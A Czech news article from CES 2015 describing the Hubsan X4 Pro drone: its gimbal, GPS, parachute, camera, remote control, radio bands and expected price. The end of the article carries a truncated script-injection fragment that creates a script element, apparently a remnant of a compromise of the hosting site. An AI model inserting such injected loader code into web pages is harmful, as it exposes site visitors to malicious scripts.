UAV | UAS

CES 2015: Hubsan X4 Pro

Shenzhen Hubsan Technology se výrobou létajících strojů věnuje již od roku 2010, ale šlo především o modely spíše pro nadšence, než uživatele, kteří potřebují „komerční stroj“. To by měl změnit nový Hubsan X4 Pro H109S, zhruba stejné velikosti jako DJI Phantom, kterému se stane konkurentem.

Hubsan X4 Pro | foto: Hubsan

Hubsan X4 Pro | foto: Hubsan

Hubsan X4 Pro je osazen 3osým gimbalem a GPS navigací, jeho letová výdrž má být až 40 minut (reálně spíše 20-30 minut; nebyla dosud potvrzena kapacita baterií), přičemž by měl být drone schopen automaticky odstartovat a přistát. Ve výbavě je i záchranný padákový systém, který v případě selhání systému nebo vyčerpání baterií, umožní bezpečné přistání stroje. Je zcela autonomní a lze ho vícenásobně použít.

gimbal | foto: Hubsan

gimbal | foto: Hubsan

Protože X4 Pro cílí na profesionální uživatele, nabízí vlastní 1080p kameru. Externě je podobná GoPro, ale Hubsan prozatím nespecifikoval, zda jde o „střeva“ z GoPro nebo skutečně vlastní konstrukci. Navíc je možné, že Hubsan počítá s možností nabízet a montovat různé kamery.

Dálkový ovladač má integrovanou obrazovku, na které lze sledovat v reálném čase snímaný obraz. S videopřenosem se počítá na vzdálenost 300 – 1000 m (podle typu antény apod.). Pracuje s pásmy 2,4 GHz a 5,8 GHZ, kdy pravděpodobně 2,4GHz pásmo je určeno pro kontrolu a řízení stroje (R/S), 5,8GHz pásmo přenos obrazu First Person Viewing (FPV).


I když Hubsan oficiálně neuvedl cenu, počítá se na základě údajů několika e-shopů, nabízejících jeho objednávku, že cena bude okolo 500 USD, což z X4 Pro dělá významného konkurenta pro ostatní značky.var d=document;var s=d.createElement(‚script‘);

Předchozí článek

So, a group of them began plotting a coup to remove him

Další článek

Even if they had bad experience